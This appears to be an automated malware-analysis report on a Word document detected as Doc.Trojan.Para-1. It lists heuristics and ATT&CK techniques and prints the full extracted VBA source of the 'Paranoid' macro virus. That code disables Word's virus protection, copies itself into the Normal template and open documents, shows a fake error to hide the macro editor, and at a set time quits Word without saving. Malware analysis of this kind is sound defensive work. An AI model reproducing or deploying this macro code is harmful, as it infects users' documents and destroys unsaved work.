MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains legacy WordBasic macro markers and VBA macros, with ClamAV identifying it as 'Doc.Trojan.Para-1'. The 'paranoid' VBA module includes an AutoExec subroutine that calls PayLoad and Paranoid. The Paranoid subroutine attempts to disable virus protection and import the 'paranoid' macro into both the Normal template and the active document, suggesting an attempt to establish persistence and evade detection. The PayLoad subroutine appears to manipulate the application window, though its full functionality is truncated.
Heuristics 3
-
ClamAV: Doc.Trojan.Para-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Para-1
-
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2125 bytes |
SHA-256: fef597218bb2f5431c7de0842b44a21a6f48decfb514a5cd174aa4a69cf6e3e1 |
|||
|
Detection
ClamAV:
Doc.Trojan.Para-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "paranoid"
Sub AutoExec()
Call PayLoad
Call Paranoid
End Sub
Sub FileSaveAs()
Call Paranoid
Dialogs(wdDialogFileSaveAs).Show
End Sub
Sub FileClose()
Call Paranoid
WordBasic.FileClose
End Sub
Sub Paranoid()
On Error Resume Next
With Options
.VirusProtection = False
.SaveNormalPrompt = False
.ConfirmConversions = False
End With
Set BVictim = NormalTemplate.VBProject.VBComponents
Set SVictim = ActiveDocument.VBProject.VBComponents
If BVictim.Item("paranoid").Name <> "paranoid" Then
SVictim("paranoid").Export "c:\paranoid.sys"
Set DoIt = NormalTemplate.VBProject
DoIt.VBComponents.Import ("c:\paranoid.sys")
Kill ("c:\paranoid.sys")
End If
If SVictim.Item("paranoid").Name <> "paranoid" Then
BVictim("paranoid").Export "c:\paranoid.sys"
Set DoIt = ActiveDocument.VBProject
DoIt.VBComponents.Import ("c:\paranoid.sys")
Kill ("c:\paranoid.sys")
End If
End Sub
Sub FileExit()
Call AutoExit
WordBasic.FileExit
End Sub
Sub AutoExit()
Options.VirusProtection = True
End Sub
Sub ViewVBCode()
Call Stealth
End Sub
Sub FileTemplates()
Call Stealth
End Sub
Sub ToolsMacro()
Call Stealth
End Sub
Sub Stealth()
MsgBox "Íåîáõîäèìàÿ áèáëèîòåêà VBAGRP8.DLL íå íàéäåíà.", vbOKOnly + vbExclamation, "Microsoft Visual Basic"
End Sub
Sub PayLoad()
If Hour(Now) = 13 And Minute(Now) = 30 Then
a = Application.Width
b = Application.Height
Application.WindowState = wdWindowStateNormal
Application.Resize Width:=a, Height:=b
Application.Move Left:=0, Top:=0
c = (b / a) * 5
d = a / 5
For x = 0 To d
Application.Resize Width:=a, Height:=b
a = a - 5
b = b - c
Next
MsgBox "Dis is di end, my only friend, di end...", vbOKOnly + vbExclamation + vbSystemModal, "Paranoid"
Application.Quit wdDoNotSaveChanges
End If
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.